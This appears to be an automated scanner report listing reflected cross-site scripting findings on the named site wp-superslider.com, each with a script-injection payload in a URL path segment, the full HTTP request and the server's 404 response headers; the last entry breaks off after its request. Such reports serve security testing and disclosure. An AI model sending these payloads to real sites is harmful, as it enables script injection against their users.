The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 574e5"><script>alert(1)</script>2452676616d was submitted in the REST URL parameter 2. This input was echoed as 574e5\"><script>alert(1)</script>2452676616d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content574e5"><script>alert(1)</script>2452676616d/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:02 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f714"><script>alert(1)</script>39a0a2ffe53 was submitted in the REST URL parameter 3. This input was echoed as 2f714\"><script>alert(1)</script>39a0a2ffe53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins2f714"><script>alert(1)</script>39a0a2ffe53/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:04 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674585+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fda27"><script>alert(1)</script>618a4ef6632 was submitted in the REST URL parameter 4. This input was echoed as fda27\"><script>alert(1)</script>618a4ef6632 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincatfda27"><script>alert(1)</script>618a4ef6632/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:06 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad888"><script>alert(1)</script>85bc6e4dd3f was submitted in the REST URL parameter 5. This input was echoed as ad888\"><script>alert(1)</script>85bc6e4dd3f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/plugin-dataad888"><script>alert(1)</script>85bc6e4dd3f/superslider/ssPostinCat/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:08 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674588; expires=Thu, 02-Feb-2012 19:23:08 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:08 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95bf9"><script>alert(1)</script>06d6b0fc251 was submitted in the REST URL parameter 6. This input was echoed as 95bf9\"><script>alert(1)</script>06d6b0fc251 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider95bf9"><script>alert(1)</script>06d6b0fc251/ssPostinCat/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:09 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674590+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a684e"><script>alert(1)</script>627dceec1f5 was submitted in the REST URL parameter 7. This input was echoed as a684e\"><script>alert(1)</script>627dceec1f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCata684e"><script>alert(1)</script>627dceec1f5/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:11 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674591+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674591; expires=Thu, 02-Feb-2012 19:23:11 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:11 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fcaf"><script>alert(1)</script>da9e0f185c2 was submitted in the REST URL parameter 8. This input was echoed as 2fcaf\"><script>alert(1)</script>da9e0f185c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default2fcaf"><script>alert(1)</script>da9e0f185c2/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:12 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674592+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674592; expires=Thu, 02-Feb-2012 19:23:12 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:12 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89b32"><script>alert(1)</script>7331cbe4720 was submitted in the REST URL parameter 9. This input was echoed as 89b32\"><script>alert(1)</script>7331cbe4720 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css89b32"><script>alert(1)</script>7331cbe4720 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:13 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674594+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674594; expires=Thu, 02-Feb-2012 19:23:14 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:14 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5448d"><script>alert(1)</script>cc9ed16c3fe was submitted in the REST URL parameter 1. This input was echoed as 5448d\"><script>alert(1)</script>cc9ed16c3fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site5448d"><script>alert(1)</script>cc9ed16c3fe/wp-content/plugins/superslider-show/js/lightbox.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:46 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674567+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674567; expires=Thu, 02-Feb-2012 19:22:47 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:47 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d297"><script>alert(1)</script>6e88aecf5d was submitted in the REST URL parameter 2. This input was echoed as 5d297\"><script>alert(1)</script>6e88aecf5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content5d297"><script>alert(1)</script>6e88aecf5d/plugins/superslider-show/js/lightbox.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:49 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53332
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82075"><script>alert(1)</script>60d6f3a8f48 was submitted in the REST URL parameter 3. This input was echoed as 82075\"><script>alert(1)</script>60d6f3a8f48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins82075"><script>alert(1)</script>60d6f3a8f48/superslider-show/js/lightbox.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:51 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674571+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674571; expires=Thu, 02-Feb-2012 19:22:51 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:51 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53333
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3bd6"><script>alert(1)</script>741621bff9a was submitted in the REST URL parameter 4. This input was echoed as d3bd6\"><script>alert(1)</script>741621bff9a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-showd3bd6"><script>alert(1)</script>741621bff9a/js/lightbox.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:53 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674573+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674573; expires=Thu, 02-Feb-2012 19:22:53 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:53 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cceed"><script>alert(1)</script>accf7f7fb5a was submitted in the REST URL parameter 5. This input was echoed as cceed\"><script>alert(1)</script>accf7f7fb5a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/jscceed"><script>alert(1)</script>accf7f7fb5a/lightbox.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:55 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674575+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674575; expires=Thu, 02-Feb-2012 19:22:55 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:55 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0971"><script>alert(1)</script>0fb985cf187 was submitted in the REST URL parameter 6. This input was echoed as b0971\"><script>alert(1)</script>0fb985cf187 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/js/lightbox.jsb0971"><script>alert(1)</script>0fb985cf187 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:58 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:58 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cd21"><script>alert(1)</script>f0633c6001b was submitted in the REST URL parameter 1. This input was echoed as 4cd21\"><script>alert(1)</script>f0633c6001b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site4cd21"><script>alert(1)</script>f0633c6001b/wp-content/plugins/superslider-show/js/slideshow.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
